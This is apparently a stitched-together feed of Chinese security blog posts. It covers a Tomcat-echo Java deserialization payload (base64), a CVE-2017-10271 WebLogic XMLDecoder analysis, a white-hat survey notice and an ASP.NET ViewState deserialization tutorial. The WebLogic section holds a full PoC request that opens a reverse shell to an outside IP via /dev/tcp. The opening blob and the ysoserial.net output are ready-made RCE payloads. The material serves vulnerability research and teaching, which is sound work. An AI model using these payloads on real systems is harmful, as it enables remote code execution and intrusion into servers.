bmcvQ2xhc3M7AQAEdmFyNQEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAGcmVzdWx0AQACW0IBAAlwcm9jZXNzb3IBABJMamF2YS9sYW5nL09iamVjdDsBAANyZXEBAARyZXNwAQABagEAAUkBAAF0AQASTGphdmEvbGFuZy9UaHJlYWQ7AQADc3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQADb2JqAQAKcHJvY2Vzc29ycwEAEExqYXZhL3V0aWwvTGlzdDsBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAFpAQAEZmxhZwEAAVoBAAVncm91cAEAF0xqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQABZgEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAd0aHJlYWRzAQATW0xqYXZhL2xhbmcvVGhyZWFkOwEADVN0YWNrTWFwVGFibGUHANAHANEHANIHAKcHAKMHAJoHAJ0HAGMHAMgHAMsBAApTb3VyY2VGaWxlAQAVVG9tY2F0RWNob0luamVjdC5qYXZhDABHAEgHANIMANMA1AwA1QDWDADXANgMANkA2gcA0QwA2wDcDADdAN4MAN8A4AEABGV4ZWMMAOEA4gEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MAOMA2AEABmdsb2JhbAEADmphdmEvdXRpbC9MaXN0DADkAOUMAN0A5gEAC2dldFJlc3BvbnNlAQAPamF2YS9sYW5nL0NsYXNzDADnAOgBABBqYXZhL2xhbmcvT2JqZWN0BwDpDADqAOsBAAlnZXRIZWFkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQADY21kDADsAO0BAAlzZXRTdGF0dXMMAO4AXwEAEWphdmEvbGFuZy9JbnRlZ2VyDABHAO8BAAdvcy5uYW1lBwDwDADxAPIMAPMA4AEABndpbmRvdwEAB2NtZC5leGUBAAIvYwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABHAPQMAPUA9gcA9wwA-AD5DABHAPoBAAJcQQwA-wD8DAD9AOAMAP4A_wEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwBAAEBDAECAQMBAAhzZXRCeXRlcwwBBADoAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24MAQUASAEAI3lzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAFWphdmEvbGFuZy9UaHJlYWRHcm91cAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZXRTdXBlcmNsYXNzAQAEc2l6ZQEAAygpSQEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdpc0VtcHR5AQADKClaAQAEVFlQRQEABChJKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEACGdldEJ5dGVzAQAEKClbQgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAEWdldERlY2xhcmVkTWV0aG9kAQAPcHJpbnRTdGFja1RyYWNlACEARQBGAAAAAAAEAAEARwBIAAEASQAAAC8AAQABAAAABSq3AAGxAAAAAgBKAAAABgABAAAAEQBLAAAADAABAAAABQBMAE0AAAABAE4ATwACAEkAAAA_AAAAAwAAAAGxAAAAAgBKAAAABgABAAAAYABLAAAAIAADAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFIAUwACAFQAAAAEAAEAVQABAE4AVgACAEkAAABJAAAABAAAAAGxAAAAAgBKAAAABgABAAAAZgBLAAAAKgAEAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFcAWAACAAAAAQBZAFoAAwBUAAAABAABAFUACABbAEgAAQBJAAAF7QAIABEAAAMDAzu4AAK2AANMAU0rtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4DNgQVBC2-ogLNLRUEMjoFGQXHAAanArkZBbYACjoGGQYSC7YADJoADRkGEg22AAyaAAanApsZBbYABBIOtgAGTSwEtgAHLBkFtgAIOgcZB8EAD5oABqcCeBkHtgAEEhC2AAZNLAS2AAcsGQe2AAg6BxkHtgAEEhG2AAZNpwAWOggZB7YABLYAE7YAExIRtgAGTSwEtgAHLBkHtgAIOgcZB7YABLYAExIUtgAGTacAEDoIGQe2AAQSFLYABk0sBLYABywZB7YACDoHGQe2AAQSFbYABk0sBLYABywZB7YACMAAFsAAFjoIAzYJFQkZCLkAFwEAogHLGQgVCbkAGAIAOgoZCrYABBIZtgAGTSwEtgAHLBkKtgAIOgsZC7YABBIaA70AG7YAHBkLA70AHbYAHjoMGQu2AAQSHwS9ABtZAxIgU7YAHBkLBL0AHVkDEiFTtgAewAAgOgYZBsYBVxkGtgAimgFPGQy2AAQSIwS9ABtZA7IAJFO2ABwZDAS9AB1ZA7sAJVkRAMi3ACZTtgAeVxInuAAotgApEiq2AAyZABkGvQAgWQMSK1NZBBIsU1kFGQZTpwAWBr0AIFkDEi1TWQQSLlNZBRkGUzoNuwAvWbsAMFkZDbcAMbYAMrYAM7cANBI1tgA2tgA3tgA4Og4SObgAOjoPGQ-2ADs6BxkPEjwGvQAbWQMSPVNZBLIAJFNZBbIAJFO2AD4ZBwa9AB1ZAxkOU1kEuwAlWQO3ACZTWQW7ACVZGQ6-twAmU7YAHlcZDLYABBI_BL0AG1kDGQ9TtgAcGQwEvQAdWQMZB1O2AB5XpwBOOg8SQbgAOjoQGRASQgS9ABtZAxI9U7YAPhkQBL0AHVkDGQ5TtgAeOgcZDLYABBI_BL0AG1kDGRBTtgAcGQwEvQAdWQMZB1O2AB5XBDsamQAGpwAJhAkBp_4vGpkABqcAEacACDoFpwADhAQBp_0ypwAISyq2AESxAAgAlwCiAKUAEgDFANMA1gASAhUCiAKLAEAAMAA7Au8AQwA-AFkC7wBDAFwAfALvAEMAfwLpAu8AQwAAAvoC_QBDAAMASgAAAQYAQQAAABUAAgAWAAkAFwALABgAFQAaABoAGwAmABwAMAAeADYAHwA-ACAARQAhAFwAIgBnACMAbAAkAHQAJQB_ACYAigAnAI8AKACXACoAogAtAKUAKwCnACwAuAAuAL0ALwDFADEA0wA0ANYAMgDYADMA4wA1AOgANgDwADcA-wA4AQAAOQEOADoBHQA7ASgAPAEzAD0BOAA-AUAAPwFZAEABfwBBAYwAQgG3AEMB8gBEAhUARgIcAEcCIwBIAmYASQKIAE4CiwBKAo0ASwKUAEwCtABNAtYATwLYAFEC3wA6AuUAUwLsAFYC7wBUAvEAVQL0ABwC-gBaAv0AWAL-AFkDAgBbAEsAAADeABYApwARAFwAXQAIANgACwBcAF0ACAIcAGwAXgBfAA8ClABCAF4AXwAQAo0ASQBgAGEADwHyAOYAYgBjAA0CFQDDAGQAZQAOASgBtwBmAGcACgFAAZ8AaABnAAsBWQGGAGkAZwAMAREB1ABqAGsACQA2ArYAbABtAAUARQKnAG4AbwAGAHQCeABwAGcABwEOAd4AcQByAAgC8QADAFwAcwAFACkC0QB0AGsABAACAvgAdQB2AAAACQLxAHcAeAABAAsC7wB5AHoAAgAmAtQAewB8AAMC_gAEAFwAcwAAAH0AAACoABf_ACkABQEHAH4HAH8HAAkBAAD8ABQHAID8ABoHAIEC_AAiBwCCZQcAgxJdBwCDDP0ALQcAhAH-AMsHAIIHAIIHAIJSBwCF_wCaAA8BBwB-BwB_BwAJAQcAgAcAgQcAggcAhAEHAIIHAIIHAIIHAIUHAD0AAQcAhvsASvkAAfgABvoABf8ABgAFAQcAfgcAfwcACQEAAEIHAIcE_wAFAAAAAEIHAIcEAAEAiAAAAAIAiXVxAH4AJAAAAdjK_rq-AAAANAAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAAMwABAAEAAAAFKrcAAbEAAAACAA0AAAAKAAIAAACUAAQAlQAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHNyABRqYXZhLm1hdGguQmlnSW50ZWdlcoz8nx-pO_sdAwAGSQAIYml0Q291bnRJAAliaXRMZW5ndGhJABNmaXJzdE5vbnplcm9CeXRlTnVtSQAMbG93ZXN0U2V0Qml0SQAGc2lnbnVtWwAJbWFnbml0dWRldAACW0J4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHD_______________7____-AAAAAXVxAH4AJAAAAAEBeHg$

凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑凑字数

参考

1.https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464

References

[1] ysoserial: https://github.com/frohoff/ysoserial
[2] Java-Rce-Echo: https://github.com/feihong-cs/Java-Rce-Echo

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

XMLDecoder反序列化与CVE-2017-10271

Thu, 24 Jun 2021 17:23:00 +0800

原创 Syst1m 2021-06-24 17:23

XMLEncoder与 XMLDecoder使用XMLEncoder来生成表示JavaBeans组件（bea

XMLEncoder与 XMLDecoder

使用XMLEncoder来生成表示JavaBeans组件（bean）的XML文档，用XMLDecoder读取使用 XMLEncoder 创建的XML文档获取JavaBeans

•XMLEncoder示例

import javax.swing.*;import java.beans.XMLEncoder;import java.io.BufferedOutputStream;import java.io.FileOutputStream;
public class xmlencoder {    public static void main(String[] args) throws Exception{        XMLEncoder a = new XMLEncoder(new BufferedOutputStream(new FileOutputStream("test.xml")));        a.writeObject(new JButton("test.test"));        a.close();    }}

生成的效果如下，在test.xml中

<java version="1.8.0_281" class="java.beans.XMLDecoder"> <object class="javax.swing.JButton">  <string>test.teststring> object>java>

•XMLDecoder示例

import javax.swing.*;import java.beans.XMLDecoder;import java.beans.XMLEncoder;import java.io.BufferedInputStream;import java.io.BufferedOutputStream;import java.io.FileInputStream;import java.io.FileOutputStream;
public class xmlencoder {    public static void main(String[] args) throws Exception{        XMLDecoder j = new XMLDecoder(new BufferedInputStream(new FileInputStream("test.xml")));        Object result = j.readObject();        System.out.println(result);        j.close();    }}

最终生成的打印结果为

javax.swing.JButton[,0,0,0x0,invalid,alignmentX=0.0,alignmentY=0.5,border=javax.swing.plaf.BorderUIResource$CompoundBorderUIResource@1b2c6ec2,flags=296,maximumSize=,minimumSize=,preferredSize=,defaultIcon=,disabledIcon=,disabledSelectedIcon=,margin=javax.swing.plaf.InsetsUIResource[top=2,left=14,bottom=2,right=14],paintBorder=true,paintFocus=true,pressedIcon=,rolloverEnabled=true,rolloverIcon=,rolloverSelectedIcon=,selectedIcon=,text=test.test,defaultCapable=true]

XML标签、属性

•string标签

test,test 字符串的在XML中表示方式为`test.test

•object标签

通过标签表示对象， class 属性指定具体类(用于调用其内部方法)， method 属性指定具体方法名称(比如构造函数的的方法名为 new ) new JButton("test,test") 对应的XML文档:

<object class="javax.swing.JButton">    <void method="setText">    <string>test,teststring>    void>object>

•void标签

通过 void 标签表示函数调用、赋值等操作， method 属性指定具体的方法名称。 JButton b = new JButton();b.setText("Hello, world"); 对应的XML文档:

<object class="javax.swing.JButton">    <void method="setText">    <string>Hello,xmlstring>    void>object>

•array标签

通过 array 标签表示数组， class 属性指定具体类，内部 void 标签的 index 属性表示根据指定数组索引赋值。String[] s = new String[3];s[1] = "Hello,xml"; 对应的XML文档:

class="java.lang.String" length="3">     <void index="1">    <string>Hello,xmlstring>  void></array>

XMLDecoder反序列化漏洞

•这里的示例代码还是使用原来的代码

public static void main(String[] args) throws Exception{        XMLDecoder j = new XMLDecoder(new BufferedInputStream(new FileInputStream("test.xml")));        Object result = j.readObject();        j.close();    }

•这里将原有的test.xml修改为恶意XML

<java version="1.8.0_112" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="1">  <void index="0">   <string>calcstring>  void> array> <void method="start"/>void>java>

•运行弹出计算器

Weblogic Docker调试环境搭建

这里的docker我是使用的kali中的

•docker的8453开启，位于docker-compose.yml

version: '2'services:weblogic:image: vulhub/weblogicports:- "7001:7001"- "8453:8453"

•下载运行镜像

•修改/root/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh

添加代码

debugFlag="true"export debugFlag

•重启docker

•把 weblogic的源码和jdk包都拷贝出来

docker cp 9bc5c6e5290c:/root ./test/

•拷贝到我的代码机器

•idea打开root\Oracle\Middleware目录•把Middleware目录下所有的*.jar包都放在一个libjar的文件夹

find ./ -name *.jar -exec cp {} ./libjar/ \;

•idea中的jdk设置为环境自带的1.6

•idea添加依赖库

•远程调试

•开启debug

•下断点

•发包，出现这样的情况说明环境搭建成功

CVE-2017-10271

•受影响版本：

WebLogic 10.3.6.0.0WebLogic 12.1.3.0.0WebLogic 12.2.1.1.0WebLogic 12.2.1.2.0

CVE-2017-3506与CVE-2017-10271均为XMLDecoder反序列化漏洞。CVE-2017-3506修补方案为禁用object标签。CVE-2017-10271是通过void、new标签对CVE-2017-3506补丁的绕过。

漏洞复现

•poc

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1Host: xxx.xxx.xxx.xxx:7001Accept-Encoding: identityAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept: */*User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Connection: keep-aliveContent-Type: text/xml;charset=UTF-8Content-Length: 648
"http://schemas.xmlsoap.org/soap/envelope/"> "http://bea.com/2004/06/soap/workarea/">"1.4.0" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder">class="java.lang.String" length="3"><void index="0"><string>/bin/bashstring>void><void index="1"><string>-cstring>void><void index="2"><string>/bin/sh -i > /dev/tcp/107.173.81.94/6666 2<&1 0<&1string>void><void method="start"/>void>

漏洞分析

使用burp发包，查看返回包，查看调用链

•断点打到weblogic/wsee/jaxws/workcontext/WorkContextServerTube.class:37

•使用burp发包，进入断点，看到var1的值为传入的恶意数据，var2为message中的header，var3为获取WorkAreaConstants.WORK_AREA_HEADER=http://bea.com/2004/06/soap/workarea/

•var3不等于空，进入readHeaderOld 方法

weblogic/wsee/jaxws/workcontext/WorkContextTube.class:102var2.nextTag();  跳转到worktagvar2.nextTag();  跳转到javatag

通过XMLStreamWriterFactory.create函数获取恶意的Payload到var4中，var4的字节数组输入流传入WorkContextXmlInputAdapter的构造函数。

•weblogic/wsee/workarea/WorkContextXmlInputAdapter.class:19

public WorkContextXmlInputAdapter(InputStream var1) {        this.xmlDecoder = new XMLDecoder(var1);    }

将恶意的xml作为参数传入了XMLDecoder的构造函数，然后返回一个WorkContextXmlInputAdapter实例对象到上层的var6，var6作为参数传入receive函数。

•weblogic/wsee/jaxws/workcontext/WorkContextServerTube.class:69

-WorkContextXmlInputAdapter对象又被传入了WorkContextMapImpl类的receiveRequest方法。

•weblogic/workarea/WorkContextMapImpl.class:142

•weblogic/workarea/WorkContextLocalMap.class:162

又被传到receiveRequest方法中

•workarea/spi/WorkContextEntryImpl.class:72

又被传到readEntry方法中

 String var1 = var0.readUTF();

•weblogic/wsee/workarea/WorkContextXmlInputAdapter.class:104

    public String readUTF() throws IOException {        return (String)this.xmlDecoder.readObject();    }

触发this.xmlDecoder.readObject(); 反序列化，完成代码执行

References

[1] Weblogic XMLDecoder 漏洞触发链分析: https://zhuanlan.zhihu.com/p/112870627
[2] Java安全初遇-XMLDecoder与Weblogic齐活儿: https://xz.aliyun.com/t/8039

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

有奖调研 | 2021白帽调研启动！

Wed, 16 Jun 2021 18:31:00 +0800

补天平台 2021-06-16 18:31

2021白帽调研2021白帽调研网络世界的特种兵现实世界的守卫者你们借键盘指点江山你们用代码挥斥方遒技术与战

2021白帽调研

网络世界的特种兵

现实世界的守卫者

你们借键盘指点江山

你们用代码挥斥方遒

技术与战略的完美结合

让每一个漏洞无所遁形

“白帽子”

是你们的代号

更是你们坚守的目标

尊敬的各位白帽子：

为更好的了解白帽子的现状，展现白帽子的社会价值，补天漏洞响应平台特对此进行调研，并制定了《2021中国白帽子调研问卷》，以便能从中发现问题，认可价值，肯定成果，为维护网络安全做更大的贡献。

请在6月30日前扫描二维码

填写调研问卷

奖项设置

为了感谢您对2021中国白帽子人才研究做出的贡献，参与调研的白帽子均可参与抽奖：

一等奖：白帽大会VIP票+补天平台大礼包（3名）

二等奖：补天平台大礼包（10名）

三等奖：补天8周年T恤（30名）

（抽奖时间定于调研完成后）

本次问卷的调查结果仅用于《2021中国白帽子研究报告》，您的所有信息我们都会严格保密，请您放心填写。

衷心感谢您的支持与参与！

合作伙伴

分享、点赞、在看，一键三连，yyds。

阅读原文

跳转微信打开

文末赠书｜ViewState学习

Sun, 13 Jun 2021 12:13:00 +0800

CHABUG最帅运营 2021-06-13 12:13

文末正版好书赠送《企业信息安全建设与运维指南》活动5本，值得拥有，等你参与哦！认识ViewState使用vs

文末正版好书赠送《企业信息安全建设与运维指南》活动5本，值得拥有，等你参与哦！

认识ViewState

使用vs2019创建一个新的项目

image.png

有一个默认的Default.aspx

image.png

其中form表单有 runat="server" 属性，然后页面中生成了 __VIEWSTATE 和 __VIEWSTATEGENERATOR 两个隐藏字段。

image.png

使用ViewStateDecoder^[1]解密内容

image.png

看过我之前文章的人应该知道这一串/wEPDwULLTE2MTY2ODcyMjlkZPANhFrc/D/zynboI58b9RD9UhX7OF4/2ILmVw2Vu7d2是由losFormatter序列化二进制数据然后base64的字符串

image.png

反序列化回来可知其本质是一组System.Web.UI.Pair对象。我们可以在代码中向viewstate中添加键值来保存一些对象。

比如Default.aspx.cs

using System;using System.Collections.Generic;using System.Web;using System.Web.UI;using System.Web.UI.WebControls;
public partial class _Default : System.Web.UI.Page {    protected void Page_Load(object sender, EventArgs e){        ViewState.Add("asd", "asd");    }}

此时viewstate值为 /wEPDwULLTE2MTY2ODcyMjkPFgIeA2FzZAUDYXNkZGRE3e84k6pb/oXbu/72ZxNc9h9dcEj+8FXmWEbtzuCtkQ==

image.png

也正是因为viewstate可以被任何人拿过来反序列化拿到其中的敏感信息，甚至可以直接传递恶意的viewstate进行反序列化rce(这个放后面演示)，所以losformatter被弃用而转由ObjectStateFormatter代替。ObjectStateFormatter的作用就在于对viewstate进行加密，并校验签名防篡改。

viewstate的加密和防篡改

在dotnet2.0中，aspx的Page标签，或者web.config中都可以对viewstate进行加密，关键取决于以下两个值

1.ViewStateEncryptionMode="Always"2.EnableViewStateMac="true"

ViewStateEncryptionMode是一个枚举，三个选项值就不解释了。

image.png

单独加密并不能解决篡改的问题，需要EnableViewStateMac来保证数据完整性。

当在aspx页面中启用ViewStateEncryptionMode="Always"时viewstate随之加密。

image.png

而对于EnableViewStateMac

从.NET 4.5.2 开始，强制启用ViewStateMac功能，也就是说即使你将 EnableViewStateMac设置为false，也不能禁止ViewState的校验。安全公告KB2905247(于2014年9月星期二通过补丁程序发送到所有Windows计算机)将ASP.NET 设置为忽略EbableViewStateMac设置。

他的值取决于web.config中的一个键值和一个注册表的值，以及page自身的EnableViewStateMac。

在ObjectStateFormatter.Deserialize()中

image.png

array数组取决于是否启用EnableViewStateMac

image.png

这个属性又取决于EnableViewStateMacRegistryHelper类，在他的构造函数中

image.png

断点的地方从注册表中读取一个值，如果为不等于0，则返回true

image.png

也就是不为0时，强制执行

if (flag){    EnableViewStateMacRegistryHelper.EnforceViewStateMac = true;    EnableViewStateMacRegistryHelper.SuppressMacValidationErrorsFromCrossPagePostbacks = true;}

将EnforceViewStateMac设置为true

另一个if条件是

if (AppSettings.AllowInsecureDeserialization != null){    EnableViewStateMacRegistryHelper.EnforceViewStateMac = !AppSettings.AllowInsecureDeserialization.Value;    EnableViewStateMacRegistryHelper.SuppressMacValidationErrorsFromCrossPagePostbacks |= !AppSettings.AllowInsecureDeserialization.Value;}

对AllowInsecureDeserialization取反，AllowInsecureDeserialization这个值在web.config中可以配置。

<configuration>  <appSettings>    <add key="aspnet:AllowInsecureDeserialization" value="true"/>  appSettings>configuration>

而只有这两个值最起码要启用一个才能强制关闭EnforceViewStateMac，比如下图。

image.png

虽然page里赋值为false，但是因为注册表中没有禁用mac，在web.config中也没禁用web.config，所以即使在page中禁用mac，通过反射输出的值仍为true，此时仍然是启用了mac校验的。

<%    System.Reflection.PropertyInfo propertyInfo = Page.GetType().GetProperty("EnableViewStateMac", System.Reflection.BindingFlags.Public | System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Instance);    object v = propertyInfo.GetValue(Page, new object[] { });    Response.Write(propertyInfo.Name + ":" + v + "
");    Response.Write(Environment.Version.ToString(3));%>

把注册表改为0，重启IIS，此时就能禁用mac验证了。

image.png

禁用mac时的利用

当禁用mac时并且没有启用加密时，我们可以直接用LosFormatter生成payload打过去。

PS E:\code\ysoserial.net\ysoserial\bin\Debug> .\ysoserial.exe -f losformatter -g SessionViewStateHistoryItem -c "ping localhost -t"/wEyqQsAAQAAAP////8BAAAAAAAAAAwCAAAAVFN5c3RlbS5XZWIuTW9iaWxlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYQUBAAAASVN5c3RlbS5XZWIuVUkuTW9iaWxlQ29udHJvbHMuU2Vzc2lvblZpZXdTdGF0ZStTZXNzaW9uVmlld1N0YXRlSGlzdG9yeUl0ZW0BAAAAAXMBAgAAAAYDAAAA3Akvd0V5bmdjQUFRQUFBUC8vLy84QkFBQUFBQUFBQUF3Q0FBQUFYazFwWTNKdmMyOW1kQzVRYjNkbGNsTm9aV3hzTGtWa2FYUnZjaXdnVm1WeWMybHZiajB6TGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBUTXhZbVl6T0RVMllXUXpOalJsTXpVRkFRQUFBRUpOYVdOeWIzTnZablF1Vm1semRXRnNVM1IxWkdsdkxsUmxlSFF1Um05eWJXRjBkR2x1Wnk1VVpYaDBSbTl5YldGMGRHbHVaMUoxYmxCeWIzQmxjblJwWlhNQkFBQUFEMFp2Y21WbmNtOTFibVJDY25WemFBRUNBQUFBQmdNQUFBREFCVHcvZUcxc0lIWmxjbk5wYjI0OUlqRXVNQ0lnWlc1amIyUnBibWM5SW5WMFppMHhOaUkvUGcwS1BFOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpQk5aWFJvYjJST1lXMWxQU0pUZEdGeWRDSWdTWE5KYm1sMGFXRnNURzloWkVWdVlXSnNaV1E5SWtaaGJITmxJaUI0Yld4dWN6MGlhSFIwY0RvdkwzTmphR1Z0WVhNdWJXbGpjbTl6YjJaMExtTnZiUzkzYVc1bWVDOHlNREEyTDNoaGJXd3ZjSEpsYzJWdWRHRjBhVzl1SWlCNGJXeHVjenB6WkQwaVkyeHlMVzVoYldWemNHRmpaVHBUZVhOMFpXMHVSR2xoWjI1dmMzUnBZM003WVhOelpXMWliSGs5VTNsemRHVnRJaUI0Yld4dWN6cDRQU0pvZEhSd09pOHZjMk5vWlcxaGN5NXRhV055YjNOdlpuUXVZMjl0TDNkcGJtWjRMekl3TURZdmVHRnRiQ0krRFFvZ0lEeFBZbXBsWTNSRVlYUmhVSEp2ZG1sa1pYSXVUMkpxWldOMFNXNXpkR0Z1WTJVK0RRb2dJQ0FnUEhOa09sQnliMk5sYzNNK0RRb2dJQ0FnSUNBOGMyUTZVSEp2WTJWemN5NVRkR0Z5ZEVsdVptOCtEUW9nSUNBZ0lDQWdJRHh6WkRwUWNtOWpaWE56VTNSaGNuUkpibVp2SUVGeVozVnRaVzUwY3owaUwyTWdjR2x1WnlCc2IyTmhiR2h2YzNRZ0xYUWlJRk4wWVc1a1lYSmtSWEp5YjNKRmJtTnZaR2x1WnowaWUzZzZUblZzYkgwaUlGTjBZVzVrWVhKa1QzVjBjSFYwUlc1amIyUnBibWM5SW50NE9rNTFiR3g5SWlCVmMyVnlUbUZ0WlQwaUlpQlFZWE56ZDI5eVpEMGllM2c2VG5Wc2JIMGlJRVJ2YldGcGJqMGlJaUJNYjJGa1ZYTmxjbEJ5YjJacGJHVTlJa1poYkhObElpQkdhV3hsVG1GdFpUMGlZMjFrSWlBdlBnMEtJQ0FnSUNBZ1BDOXpaRHBRY205alpYTnpMbE4wWVhKMFNXNW1iejROQ2lBZ0lDQThMM05rT2xCeWIyTmxjM00rRFFvZ0lEd3ZUMkpxWldOMFJHRjBZVkJ5YjNacFpHVnlMazlpYW1WamRFbHVjM1JoYm1ObFBnMEtQQzlQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEkrQ3c9PQs=

image.png

这里爆出了TextFormattingRunProperties的错误，说明执行了命令

image.png

在传递__VIEWSTATE参数时发现是直接GET传参，其实POST传参也行，为什么直接传递参数就会被解析？是因为在Page中还有一个EnableViewState="false"的属性。

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="Default.aspx.cs" Inherits="_Default" EnableViewState="true" EnableViewStateMac="false" %>
"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"http://www.w3.org/1999/xhtml">"server">        "form1" runat="server">                    <%                System.Reflection.PropertyInfo propertyInfo = Page.GetType().GetProperty("EnableViewStateMac", System.Reflection.BindingFlags.Public | System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Instance);                object v = propertyInfo.GetValue(Page, new object[] { });                Response.Write(propertyInfo.Name + ":" + v + "
");                Response.Write(Environment.Version.ToString(3));                ViewState.Add("asd", "asd");            %>

当 EnableViewState="true" 时，__VIEWSTATE为 /wEPDwUKLTg0NTYxMzIxNQ8WAh4DYXNkBQNhc2RkZA==

false时，__VIEWSTATE为 /wEPDwUKLTg0NTYxMzIxNWRk。

